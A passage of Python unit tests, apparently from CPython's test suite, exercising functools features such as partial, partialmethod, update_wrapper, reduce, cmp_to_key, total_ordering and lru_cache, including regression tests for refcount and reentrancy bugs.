self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
